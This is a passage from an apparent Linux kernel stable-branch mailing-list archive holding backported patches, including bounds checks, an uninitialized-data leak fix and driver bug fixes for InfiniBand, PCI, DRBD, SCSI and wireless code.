void ipoib_flush_paths(struct net_device *dev);
struct ipoib_dev_priv *ipoib_intf_alloc(const char *format);
diff --git a/drivers/infiniband/ulp/ipoib/ipoib_cm.c b/drivers/infiniband/ulp/ipoib/ipoib_cm.c
index 3eceb61..aa9ad2d 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib_cm.c
+++ b/drivers/infiniband/ulp/ipoib/ipoib_cm.c
@@ -1290,6 +1290,8 @@ void ipoib_cm_destroy_tx(struct ipoib_cm_tx *tx)
}
}

+#define QPN_AND_OPTIONS_OFFSET 4
+
static void ipoib_cm_tx_start(struct work_struct *work)
{
struct ipoib_dev_priv *priv = container_of(work, struct ipoib_dev_priv,
@@ -1298,6 +1300,7 @@ static void ipoib_cm_tx_start(struct work_struct *work)
struct ipoib_neigh *neigh;
struct ipoib_cm_tx *p;
unsigned long flags;
+ struct ipoib_path *path;
int ret;

struct ib_sa_path_rec pathrec;
@@ -1310,7 +1313,19 @@ static void ipoib_cm_tx_start(struct work_struct *work)
p = list_entry(priv->cm.start_list.next, typeof(*p), list);
list_del_init(&p->list);
neigh = p->neigh;
+
qpn = IPOIB_QPN(neigh->daddr);
+ /*
+ * As long as the search is with these 2 locks,
+ * path existence indicates its validity.
+ */
+ path = __path_find(dev, neigh->daddr + QPN_AND_OPTIONS_OFFSET);
+ if (!path) {
+ pr_info("%s ignore not valid path %pI6\n",
+ __func__,
+ neigh->daddr + QPN_AND_OPTIONS_OFFSET);
+ goto free_neigh;
+ }
memcpy(&pathrec, &p->path->pathrec, sizeof pathrec);

spin_unlock_irqrestore(&priv->lock, flags);
@@ -1322,6 +1337,7 @@ static void ipoib_cm_tx_start(struct work_struct *work)
spin_lock_irqsave(&priv->lock, flags);

if (ret) {
+free_neigh:
neigh = p->neigh;
if (neigh) {
neigh->cm = NULL;
diff --git a/drivers/infiniband/ulp/ipoib/ipoib_main.c b/drivers/infiniband/ulp/ipoib/ipoib_main.c
index a481094..375f9ed 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib_main.c
+++ b/drivers/infiniband/ulp/ipoib/ipoib_main.c
@@ -251,7 +251,7 @@ int ipoib_set_mode(struct net_device *dev, const char *buf)
return -EINVAL;
}

-static struct ipoib_path *__path_find(struct net_device *dev, void *gid)
+struct ipoib_path *__path_find(struct net_device *dev, void *gid)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
struct rb_node *n = priv->path_tree.rb_node;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:03 UTC
Permalink
From: Punit Agrawal <***@arm.com>

commit 806487a8fc8f385af75ed261e9ab658fc845e633 upstream.

Although ghes_proc() tests for errors while reading the error status,
it always return success (0). Fix this by propagating the return
value.

Fixes: d334a49113a4a33 (ACPI, APEI, Generic Hardware Error Source memory error support)
Signed-of-by: Punit Agrawal <***@arm.com>
Tested-by: Tyler Baicar <***@codeaurora.org>
Reviewed-by: Borislav Petkov <***@suse.de>
[ rjw: Subject ]
Signed-off-by: Rafael J. Wysocki <***@intel.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/acpi/apei/ghes.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/acpi/apei/ghes.c b/drivers/acpi/apei/ghes.c
index fcd7d91..070b843 100644
--- a/drivers/acpi/apei/ghes.c
+++ b/drivers/acpi/apei/ghes.c
@@ -647,7 +647,7 @@ static int ghes_proc(struct ghes *ghes)
ghes_do_proc(ghes, ghes->estatus);
out:
ghes_clear_estatus(ghes);
- return 0;
+ return rc;
}

static void ghes_add_timer(struct ghes *ghes)
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:03 UTC
Permalink
From: Myron Stowe <***@redhat.com>

commit 06cf35f903aa6da0cc8d9f81e9bcd1f7e1b534bb upstream.

Some AMD CS553x devices have read-only BARs because of a firmware or
hardware defect. There's a workaround in quirk_cs5536_vsa(), but it no
longer works after 36e8164882ca ("PCI: Restore detection of read-only
BARs"). Prior to 36e8164882ca, we filled in res->start; afterwards we
leave it zeroed out. The quirk only updated the size, so the driver tried
to use a region starting at zero, which didn't work.

Expand quirk_cs5536_vsa() to read the base addresses from the BARs and
hard-code the sizes.

On Nix's system BAR 2's read-only value is 0x6200. Prior to 36e8164882ca,
we interpret that as a 512-byte BAR based on the lowest-order bit set. Per
datasheet sec 5.6.1, that BAR (MFGPT) requires only 64 bytes; use that to
avoid clearing any address bits if a platform uses only 64-byte alignment.

[js] pcibios_bus_to_resource takes pdev, not bus in 3.12

[bhelgaas: changelog, reduce BAR 2 size to 64]
Fixes: 36e8164882ca ("PCI: Restore detection of read-only BARs")
Link: https://bugzilla.kernel.org/show_bug.cgi?id=85991#c4
Link: http://support.amd.com/TechDocs/31506_cs5535_databook.pdf
Link: http://support.amd.com/TechDocs/33238G_cs5536_db.pdf
Reported-and-tested-by: Nix <***@esperi.org.uk>
Signed-off-by: Myron Stowe <***@redhat.com>
Signed-off-by: Bjorn Helgaas <***@google.com>
Signed-off-by: Jiri Slaby <***@suse.cz>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/pci/quirks.c | 41 +++++++++++++++++++++++++++++++++++++----
1 file changed, 37 insertions(+), 4 deletions(-)

diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
index a663715..b6625e5 100644
--- a/drivers/pci/quirks.c
+++ b/drivers/pci/quirks.c
@@ -339,19 +339,52 @@ static void quirk_s3_64M(struct pci_dev *dev)
DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_S3, PCI_DEVICE_ID_S3_868, quirk_s3_64M);
DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_S3, PCI_DEVICE_ID_S3_968, quirk_s3_64M);

+static void quirk_io(struct pci_dev *dev, int pos, unsigned size,
+ const char *name)
+{
+ u32 region;
+ struct pci_bus_region bus_region;
+ struct resource *res = dev->resource + pos;
+
+ pci_read_config_dword(dev, PCI_BASE_ADDRESS_0 + (pos << 2), &region);
+
+ if (!region)
+ return;
+
+ res->name = pci_name(dev);
+ res->flags = region & ~PCI_BASE_ADDRESS_IO_MASK;
+ res->flags |=
+ (IORESOURCE_IO | IORESOURCE_PCI_FIXED | IORESOURCE_SIZEALIGN);
+ region &= ~(size - 1);
+
+ /* Convert from PCI bus to resource space */
+ bus_region.start = region;
+ bus_region.end = region + size - 1;
+ pcibios_bus_to_resource(dev, res, &bus_region);
+
+ dev_info(&dev->dev, FW_BUG "%s quirk: reg 0x%x: %pR\n",
+ name, PCI_BASE_ADDRESS_0 + (pos << 2), res);
+}
+
/*
* Some CS5536 BIOSes (for example, the Soekris NET5501 board w/ comBIOS
* ver. 1.33 20070103) don't set the correct ISA PCI region header info.
* BAR0 should be 8 bytes; instead, it may be set to something like 8k
* (which conflicts w/ BAR1's memory range).
+ *
+ * CS553x's ISA PCI BARs may also be read-only (ref:
+ * https://bugzilla.kernel.org/show_bug.cgi?id=85991 - Comment #4 forward).
*/
static void quirk_cs5536_vsa(struct pci_dev *dev)
{
+ static char *name = "CS5536 ISA bridge";
+
if (pci_resource_len(dev, 0) != 8) {
- struct resource *res = &dev->resource[0];
- res->end = res->start + 8 - 1;
- dev_info(&dev->dev, "CS5536 ISA bridge bug detected "
- "(incorrect header); workaround applied.\n");
+ quirk_io(dev, 0, 8, name); /* SMB */
+ quirk_io(dev, 1, 256, name); /* GPIO */
+ quirk_io(dev, 2, 64, name); /* MFGPT */
+ dev_info(&dev->dev, "%s bug detected (incorrect header); workaround applied\n",
+ name);
}
}
DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_CS5536_ISA, quirk_cs5536_vsa);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:03 UTC
Permalink
From: "Paul E. McKenney" <***@linux.vnet.ibm.com>

commit 536fa402221f09633e7c5801b327055ab716a363 upstream.

CPUs without single-byte and double-byte loads and stores place some
"interesting" requirements on concurrent code. For example (adapted
from Peter Hurley's test code), suppose we have the following structure:

struct foo {
spinlock_t lock1;
spinlock_t lock2;
char a; /* Protected by lock1. */
char b; /* Protected by lock2. */
};
struct foo *foop;

Of course, it is common (and good) practice to place data protected
by different locks in separate cache lines. However, if the locks are
rarely acquired (for example, only in rare error cases), and there are
a great many instances of the data structure, then memory footprint can
trump false-sharing concerns, so that it can be better to place them in
the same cache cache line as above.

But if the CPU does not support single-byte loads and stores, a store
to foop->a will do a non-atomic read-modify-write operation on foop->b,
which will come as a nasty surprise to someone holding foop->lock2. So we
now require CPUs to support single-byte and double-byte loads and stores.
Therefore, this commit adjusts the definition of __native_word() to allow
these sizes to be used by smp_load_acquire() and smp_store_release().

Signed-off-by: Paul E. McKenney <***@linux.vnet.ibm.com>
Cc: Peter Zijlstra <***@infradead.org>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <***@1wt.eu>
---
include/linux/compiler.h | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index 53563d8..453da7b 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -362,7 +362,7 @@ static __always_inline void __write_once_size(volatile void *p, void *res, int s

/* Is this type a native word size -- useful for atomic operations */
#ifndef __native_word
-# define __native_word(t) (sizeof(t) == sizeof(int) || sizeof(t) == sizeof(long))
+# define __native_word(t) (sizeof(t) == sizeof(char) || sizeof(t) == sizeof(short) || sizeof(t) == sizeof(int) || sizeof(t) == sizeof(long))
#endif

/* Compile time object size, -1 for unknown */
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:04 UTC
Permalink
From: Alex Vesker <***@mellanox.com>

commit e5ac40cd66c2f3cd11bc5edc658f012661b16347 upstream.

Because of an incorrect bit-masking done on the join state bits, when
handling a join request we failed to detect a difference between the
group join state and the request join state when joining as send only
full member (0x8). This caused the MC join request not to be sent.
This issue is relevant only when SRIOV is enabled and SM supports
send only full member.

This fix separates scope bits and join states bits a nibble each.

Fixes: b9c5d6a64358 ('IB/mlx4: Add multicast group (MCG) paravirtualization for SR-IOV')
Signed-off-by: Alex Vesker <***@mellanox.com>
Signed-off-by: Leon Romanovsky <***@kernel.org>
Signed-off-by: Doug Ledford <***@redhat.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/infiniband/hw/mlx4/mcg.c | 14 +++++++-------
1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/drivers/infiniband/hw/mlx4/mcg.c b/drivers/infiniband/hw/mlx4/mcg.c
index 25b2cdf..27bedc3 100644
--- a/drivers/infiniband/hw/mlx4/mcg.c
+++ b/drivers/infiniband/hw/mlx4/mcg.c
@@ -483,7 +483,7 @@ static u8 get_leave_state(struct mcast_group *group)
if (!group->members[i])
leave_state |= (1 << i);

- return leave_state & (group->rec.scope_join_state & 7);
+ return leave_state & (group->rec.scope_join_state & 0xf);
}

static int join_group(struct mcast_group *group, int slave, u8 join_mask)
@@ -558,8 +558,8 @@ static void mlx4_ib_mcg_timeout_handler(struct work_struct *work)
} else
mcg_warn_group(group, "DRIVER BUG\n");
} else if (group->state == MCAST_LEAVE_SENT) {
- if (group->rec.scope_join_state & 7)
- group->rec.scope_join_state &= 0xf8;
+ if (group->rec.scope_join_state & 0xf)
+ group->rec.scope_join_state &= 0xf0;
group->state = MCAST_IDLE;
mutex_unlock(&group->lock);
if (release_group(group, 1))
@@ -599,7 +599,7 @@ static int handle_leave_req(struct mcast_group *group, u8 leave_mask,
static int handle_join_req(struct mcast_group *group, u8 join_mask,
struct mcast_req *req)
{
- u8 group_join_state = group->rec.scope_join_state & 7;
+ u8 group_join_state = group->rec.scope_join_state & 0xf;
int ref = 0;
u16 status;
struct ib_sa_mcmember_data *sa_data = (struct ib_sa_mcmember_data *)req->sa_mad.data;
@@ -684,8 +684,8 @@ static void mlx4_ib_mcg_work_handler(struct work_struct *work)
u8 cur_join_state;

resp_join_state = ((struct ib_sa_mcmember_data *)
- group->response_sa_mad.data)->scope_join_state & 7;
- cur_join_state = group->rec.scope_join_state & 7;
+ group->response_sa_mad.data)->scope_join_state & 0xf;
+ cur_join_state = group->rec.scope_join_state & 0xf;

if (method == IB_MGMT_METHOD_GET_RESP) {
/* successfull join */
@@ -704,7 +704,7 @@ process_requests:
req = list_first_entry(&group->pending_list, struct mcast_req,
group_list);
sa_data = (struct ib_sa_mcmember_data *)req->sa_mad.data;
- req_join_state = sa_data->scope_join_state & 0x7;
+ req_join_state = sa_data->scope_join_state & 0xf;

/* For a leave request, we will immediately answer the VF, and
* update our internal counters. The actual leave will be sent
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:04 UTC
Permalink
From: Al Viro <***@zeniv.linux.org.uk>

commit 7798bf2140ebcc36eafec6a4194fffd8d585d471 upstream.

On faulting sigreturn we do get SIGSEGV, all right, but anything
we'd put into pt_regs could end up in the coredump. And since
__copy_from_user() never zeroed on arc, we'd better bugger off
on its failure without copying random uninitialized bits of
kernel stack into pt_regs...

Signed-off-by: Al Viro <***@zeniv.linux.org.uk>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
arch/arc/kernel/signal.c | 11 ++++++-----
1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/arch/arc/kernel/signal.c b/arch/arc/kernel/signal.c
index 6763654..0823087 100644
--- a/arch/arc/kernel/signal.c
+++ b/arch/arc/kernel/signal.c
@@ -80,13 +80,14 @@ static int restore_usr_regs(struct pt_regs *regs, struct rt_sigframe __user *sf)
int err;

err = __copy_from_user(&set, &sf->uc.uc_sigmask, sizeof(set));
- if (!err)
- set_current_blocked(&set);
-
- err |= __copy_from_user(regs, &(sf->uc.uc_mcontext.regs),
+ err |= __copy_from_user(regs, &(sf->uc.uc_mcontext.regs.scratch),
sizeof(sf->uc.uc_mcontext.regs.scratch));
+ if (err)
+ return err;

- return err;
+ set_current_blocked(&set);
+
+ return 0;
}

static inline int is_do_ss_needed(unsigned int magic)
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:04 UTC
Permalink
From: Joe Perches <***@perches.com>

commit 7f032d6ef6154868a2a5d5f6b2c3f8587292196c upstream.

The seq_printf return value, because it's frequently misused,
will eventually be converted to void.

See: commit 1f33c41c03da ("seq_file: Rename seq_overflow() to
seq_has_overflowed() and make public")

Signed-off-by: Joe Perches <***@perches.com>
Signed-off-by: Andrew Morton <***@linux-foundation.org>
Signed-off-by: Linus Torvalds <***@linux-foundation.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
ipc/msg.c | 34 ++++++++++++++++++----------------
ipc/sem.c | 26 ++++++++++++++------------
ipc/shm.c | 42 ++++++++++++++++++++++--------------------
ipc/util.c | 6 ++++--
4 files changed, 58 insertions(+), 50 deletions(-)

diff --git a/ipc/msg.c b/ipc/msg.c
index 32aaaab..9ce27d8 100644
--- a/ipc/msg.c
+++ b/ipc/msg.c
@@ -1046,21 +1046,23 @@ static int sysvipc_msg_proc_show(struct seq_file *s, void *it)
struct user_namespace *user_ns = seq_user_ns(s);
struct msg_queue *msq = it;

- return seq_printf(s,
- "%10d %10d %4o %10lu %10lu %5u %5u %5u %5u %5u %5u %10lu %10lu %10lu\n",
- msq->q_perm.key,
- msq->q_perm.id,
- msq->q_perm.mode,
- msq->q_cbytes,
- msq->q_qnum,
- msq->q_lspid,
- msq->q_lrpid,
- from_kuid_munged(user_ns, msq->q_perm.uid),
- from_kgid_munged(user_ns, msq->q_perm.gid),
- from_kuid_munged(user_ns, msq->q_perm.cuid),
- from_kgid_munged(user_ns, msq->q_perm.cgid),
- msq->q_stime,
- msq->q_rtime,
- msq->q_ctime);
+ seq_printf(s,
+ "%10d %10d %4o %10lu %10lu %5u %5u %5u %5u %5u %5u %10lu %10lu %10lu\n",
+ msq->q_perm.key,
+ msq->q_perm.id,
+ msq->q_perm.mode,
+ msq->q_cbytes,
+ msq->q_qnum,
+ msq->q_lspid,
+ msq->q_lrpid,
+ from_kuid_munged(user_ns, msq->q_perm.uid),
+ from_kgid_munged(user_ns, msq->q_perm.gid),
+ from_kuid_munged(user_ns, msq->q_perm.cuid),
+ from_kgid_munged(user_ns, msq->q_perm.cgid),
+ msq->q_stime,
+ msq->q_rtime,
+ msq->q_ctime);
+
+ return 0;
}
#endif
diff --git a/ipc/sem.c b/ipc/sem.c
index 47a1519..57242be 100644
--- a/ipc/sem.c
+++ b/ipc/sem.c
@@ -2172,17 +2172,19 @@ static int sysvipc_sem_proc_show(struct seq_file *s, void *it)

sem_otime = get_semotime(sma);

- return seq_printf(s,
- "%10d %10d %4o %10u %5u %5u %5u %5u %10lu %10lu\n",
- sma->sem_perm.key,
- sma->sem_perm.id,
- sma->sem_perm.mode,
- sma->sem_nsems,
- from_kuid_munged(user_ns, sma->sem_perm.uid),
- from_kgid_munged(user_ns, sma->sem_perm.gid),
- from_kuid_munged(user_ns, sma->sem_perm.cuid),
- from_kgid_munged(user_ns, sma->sem_perm.cgid),
- sem_otime,
- sma->sem_ctime);
+ seq_printf(s,
+ "%10d %10d %4o %10u %5u %5u %5u %5u %10lu %10lu\n",
+ sma->sem_perm.key,
+ sma->sem_perm.id,
+ sma->sem_perm.mode,
+ sma->sem_nsems,
+ from_kuid_munged(user_ns, sma->sem_perm.uid),
+ from_kgid_munged(user_ns, sma->sem_perm.gid),
+ from_kuid_munged(user_ns, sma->sem_perm.cuid),
+ from_kgid_munged(user_ns, sma->sem_perm.cgid),
+ sem_otime,
+ sma->sem_ctime);
+
+ return 0;
}
#endif
diff --git a/ipc/shm.c b/ipc/shm.c
index 08b14f6..1f141c9 100644
--- a/ipc/shm.c
+++ b/ipc/shm.c
@@ -1331,25 +1331,27 @@ static int sysvipc_shm_proc_show(struct seq_file *s, void *it)
#define SIZE_SPEC "%21lu"
#endif

- return seq_printf(s,
- "%10d %10d %4o " SIZE_SPEC " %5u %5u "
- "%5lu %5u %5u %5u %5u %10lu %10lu %10lu "
- SIZE_SPEC " " SIZE_SPEC "\n",
- shp->shm_perm.key,
- shp->shm_perm.id,
- shp->shm_perm.mode,
- shp->shm_segsz,
- shp->shm_cprid,
- shp->shm_lprid,
- shp->shm_nattch,
- from_kuid_munged(user_ns, shp->shm_perm.uid),
- from_kgid_munged(user_ns, shp->shm_perm.gid),
- from_kuid_munged(user_ns, shp->shm_perm.cuid),
- from_kgid_munged(user_ns, shp->shm_perm.cgid),
- shp->shm_atim,
- shp->shm_dtim,
- shp->shm_ctim,
- rss * PAGE_SIZE,
- swp * PAGE_SIZE);
+ seq_printf(s,
+ "%10d %10d %4o " SIZE_SPEC " %5u %5u "
+ "%5lu %5u %5u %5u %5u %10lu %10lu %10lu "
+ SIZE_SPEC " " SIZE_SPEC "\n",
+ shp->shm_perm.key,
+ shp->shm_perm.id,
+ shp->shm_perm.mode,
+ shp->shm_segsz,
+ shp->shm_cprid,
+ shp->shm_lprid,
+ shp->shm_nattch,
+ from_kuid_munged(user_ns, shp->shm_perm.uid),
+ from_kgid_munged(user_ns, shp->shm_perm.gid),
+ from_kuid_munged(user_ns, shp->shm_perm.cuid),
+ from_kgid_munged(user_ns, shp->shm_perm.cgid),
+ shp->shm_atim,
+ shp->shm_dtim,
+ shp->shm_ctim,
+ rss * PAGE_SIZE,
+ swp * PAGE_SIZE);
+
+ return 0;
}
#endif
diff --git a/ipc/util.c b/ipc/util.c
index 7353425..cc10689 100644
--- a/ipc/util.c
+++ b/ipc/util.c
@@ -904,8 +904,10 @@ static int sysvipc_proc_show(struct seq_file *s, void *it)
struct ipc_proc_iter *iter = s->private;
struct ipc_proc_iface *iface = iter->iface;

- if (it == SEQ_START_TOKEN)
- return seq_puts(s, iface->header);
+ if (it == SEQ_START_TOKEN) {
+ seq_puts(s, iface->header);
+ return 0;
+ }

return iface->show(s, it);
}
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:04 UTC
Permalink
From: Richard Weinberger <***@nod.at>

commit d8e9e5e80e882b4f90cba7edf1e6cb7376e52e54 upstream.

Don't pass a size larger than iov_len to kernel_sendmsg().
Otherwise it will cause a NULL pointer deref when kernel_sendmsg()
returns with rv < size.

DRBD as external module has been around in the kernel 2.4 days already.
We used to be compatible to 2.4 and very early 2.6 kernels,
we used to use
rv = sock_sendmsg(sock, &msg, iov.iov_len);
then later changed to
rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
when we should have used
rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);

tcp_sendmsg() used to totally ignore the size parameter.
57be5bd ip: convert tcp_sendmsg() to iov_iter primitives
changes that, and exposes our long standing error.

Even with this error exposed, to trigger the bug, we would need to have
an environment (config or otherwise) causing us to not use sendpage()
for larger transfers, a failing connection, and have it fail "just at the
right time". Apparently that was unlikely enough for most, so this went
unnoticed for years.

Still, it is known to trigger at least some of these,
and suspected for the others:
[0] http://lists.linbit.com/pipermail/drbd-user/2016-July/023112.html
[1] http://lists.linbit.com/pipermail/drbd-dev/2016-March/003362.html
[2] https://forums.grsecurity.net/viewtopic.php?f=3&t=4546
[3] https://ubuntuforums.org/showthread.php?t=2336150
[4] http://e2.howsolveproblem.com/i/1175162/

This should go into 4.9,
and into all stable branches since and including v4.0,
which is the first to contain the exposing change.

It is correct for all stable branches older than that as well
(which contain the DRBD driver; which is 2.6.33 and up).

It requires a small "conflict" resolution for v4.4 and earlier, with v4.5
we dropped the comment block immediately preceding the kernel_sendmsg().

Fixes: b411b3637fa7 ("The DRBD driver")
Cc: ***@zeniv.linux.org.uk
Cc: ***@iteg.at
Cc: ***@iteg.at
Reported-by: Christoph Lechleitner <***@iteg.at>
Tested-by: Christoph Lechleitner <***@iteg.at>
Signed-off-by: Richard Weinberger <***@nod.at>
[changed oneliner to be "obvious" without context; more verbose message]
Signed-off-by: Lars Ellenberg <***@linbit.com>
Signed-off-by: Jens Axboe <***@fb.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/block/drbd/drbd_main.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/block/drbd/drbd_main.c b/drivers/block/drbd/drbd_main.c
index a5dca6a..776fc08 100644
--- a/drivers/block/drbd/drbd_main.c
+++ b/drivers/block/drbd/drbd_main.c
@@ -1771,7 +1771,7 @@ int drbd_send(struct drbd_tconn *tconn, struct socket *sock,
* do we need to block DRBD_SIG if sock == &meta.socket ??
* otherwise wake_asender() might interrupt some send_*Ack !
*/
- rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
+ rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);
if (rv == -EAGAIN) {
if (we_should_drop_the_connection(tconn, sock))
break;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:04 UTC
Permalink
From: Dan Carpenter <***@oracle.com>

commit 7bc2b55a5c030685b399bb65b6baa9ccc3d1f167 upstream.

We need to put an upper bound on "user_len" so the memcpy() doesn't
overflow.

[js] no ARCMSR_API_DATA_BUFLEN defined, use the number

Reported-by: Marco Grassi <***@gmail.com>
Signed-off-by: Dan Carpenter <***@oracle.com>
Reviewed-by: Tomas Henzl <***@redhat.com>
Signed-off-by: Martin K. Petersen <***@oracle.com>
Signed-off-by: Jiri Slaby <***@suse.cz>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/scsi/arcmsr/arcmsr_hba.c | 8 +++++++-
1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/drivers/scsi/arcmsr/arcmsr_hba.c b/drivers/scsi/arcmsr/arcmsr_hba.c
index 1822cb9..66dda86 100644
--- a/drivers/scsi/arcmsr/arcmsr_hba.c
+++ b/drivers/scsi/arcmsr/arcmsr_hba.c
@@ -1803,7 +1803,8 @@ static int arcmsr_iop_message_xfer(struct AdapterControlBlock *acb,

case ARCMSR_MESSAGE_WRITE_WQBUFFER: {
unsigned char *ver_addr;
- int32_t my_empty_len, user_len, wqbuf_firstindex, wqbuf_lastindex;
+ uint32_t user_len;
+ int32_t my_empty_len, wqbuf_firstindex, wqbuf_lastindex;
uint8_t *pQbuffer, *ptmpuserbuffer;

ver_addr = kmalloc(1032, GFP_ATOMIC);
@@ -1820,6 +1821,11 @@ static int arcmsr_iop_message_xfer(struct AdapterControlBlock *acb,
}
ptmpuserbuffer = ver_addr;
user_len = pcmdmessagefld->cmdmessage.Length;
+ if (user_len > 1032) {
+ retvalue = ARCMSR_MESSAGE_FAIL;
+ kfree(ver_addr);
+ goto message_out;
+ }
memcpy(ptmpuserbuffer, pcmdmessagefld->messagedatabuffer, user_len);
wqbuf_lastindex = acb->wqbuf_lastindex;
wqbuf_firstindex = acb->wqbuf_firstindex;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:04 UTC
Permalink
From: Florian Fainelli <***@gmail.com>

commit f823a2aa8f4674c095a5413b9e3ba12d82df06f2 upstream.

wlc_phy_txpower_get_current() does a logical OR of power->flags, which
presumes that power.flags was initiliazed earlier by the caller,
unfortunately, this is not the case, so make sure we zero out the struct
tx_power before calling into wlc_phy_txpower_get_current().

Reported-by: coverity (CID 146011)
Fixes: 5b435de0d7868 ("net: wireless: add brcm80211 drivers")
Signed-off-by: Florian Fainelli <***@gmail.com>
Acked-by: Arend van Spriel <***@broadcom.com>
Signed-off-by: Kalle Valo <***@codeaurora.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/net/wireless/brcm80211/brcmsmac/stf.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/wireless/brcm80211/brcmsmac/stf.c b/drivers/net/wireless/brcm80211/brcmsmac/stf.c
index dd91627..0ab865d 100644
--- a/drivers/net/wireless/brcm80211/brcmsmac/stf.c
+++ b/drivers/net/wireless/brcm80211/brcmsmac/stf.c
@@ -87,7 +87,7 @@ void
brcms_c_stf_ss_algo_channel_get(struct brcms_c_info *wlc, u16 *ss_algo_channel,
u16 chanspec)
{
- struct tx_power power;
+ struct tx_power power = { };
u8 siso_mcs_id, cdd_mcs_id, stbc_mcs_id;

/* Clear previous settings */
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:04 UTC
Permalink
From: Sara Sharon <***@intel.com>

commit d5d0689aefc59c6a5352ca25d7e6d47d03f543ce upstream.

This fixes a pretty ancient bug that hasn't manifested itself
until now.
The scratchbuf for command queue is allocated only for 32 slots
but is accessed with the queue write pointer - which can be
up to 256.
Since the scratch buf size was 16 and there are up to 256 TFDs
we never passed a page boundary when accessing the scratch buffer,
but when attempting to increase the size of the scratch buffer a
panic was quick to follow when trying to access the address resulted
in a page boundary.

Signed-off-by: Sara Sharon <***@intel.com>
Fixes: 38c0f334b359 ("iwlwifi: use coherent DMA memory for command header")
Signed-off-by: Luca Coelho <***@intel.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/net/wireless/iwlwifi/pcie/tx.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/net/wireless/iwlwifi/pcie/tx.c b/drivers/net/wireless/iwlwifi/pcie/tx.c
index f05962c..2e3a0d7 100644
--- a/drivers/net/wireless/iwlwifi/pcie/tx.c
+++ b/drivers/net/wireless/iwlwifi/pcie/tx.c
@@ -1311,9 +1311,9 @@ static int iwl_pcie_enqueue_hcmd(struct iwl_trans *trans,

/* start the TFD with the scratchbuf */
scratch_size = min_t(int, copy_size, IWL_HCMD_SCRATCHBUF_SIZE);
- memcpy(&txq->scratchbufs[q->write_ptr], &out_cmd->hdr, scratch_size);
+ memcpy(&txq->scratchbufs[idx], &out_cmd->hdr, scratch_size);
iwl_pcie_txq_build_tfd(trans, txq,
- iwl_pcie_get_scratchbuf_dma(txq, q->write_ptr),
+ iwl_pcie_get_scratchbuf_dma(txq, idx),
scratch_size, 1);

/* map first command fragment, if any remains */
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:04 UTC
Permalink
From: Peter Zijlstra <***@infradead.org>

commit 7bd3e239d6c6d1cad276e8f130b386df4234dcd7 upstream.

The fact that volatile allows for atomic load/stores is a special case
not a requirement for {READ,WRITE}_ONCE(). Their primary purpose is to
force the compiler to emit load/stores _once_.

Signed-off-by: Peter Zijlstra (Intel) <***@infradead.org>
Acked-by: Christian Borntraeger <***@de.ibm.com>
Acked-by: Will Deacon <***@arm.com>
Acked-by: Linus Torvalds <***@linux-foundation.org>
Cc: Davidlohr Bueso <***@stgolabs.net>
Cc: H. Peter Anvin <***@zytor.com>
Cc: Paul McKenney <***@linux.vnet.ibm.com>
Cc: Stephen Rothwell <***@canb.auug.org.au>
Cc: Thomas Gleixner <***@linutronix.de>
Signed-off-by: Ingo Molnar <***@kernel.org>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <***@1wt.eu>
---
include/linux/compiler.h | 16 ----------------
1 file changed, 16 deletions(-)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index c6d06e9..53563d8 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -181,29 +181,16 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);

#include <uapi/linux/types.h>

-static __always_inline void data_access_exceeds_word_size(void)
-#ifdef __compiletime_warning
-__compiletime_warning("data access exceeds word size and won't be atomic")
-#endif
-;
-
-static __always_inline void data_access_exceeds_word_size(void)
-{
-}
-
static __always_inline void __read_once_size(const volatile void *p, void *res, int size)
{
switch (size) {
case 1: *(__u8 *)res = *(volatile __u8 *)p; break;
case 2: *(__u16 *)res = *(volatile __u16 *)p; break;
case 4: *(__u32 *)res = *(volatile __u32 *)p; break;
-#ifdef CONFIG_64BIT
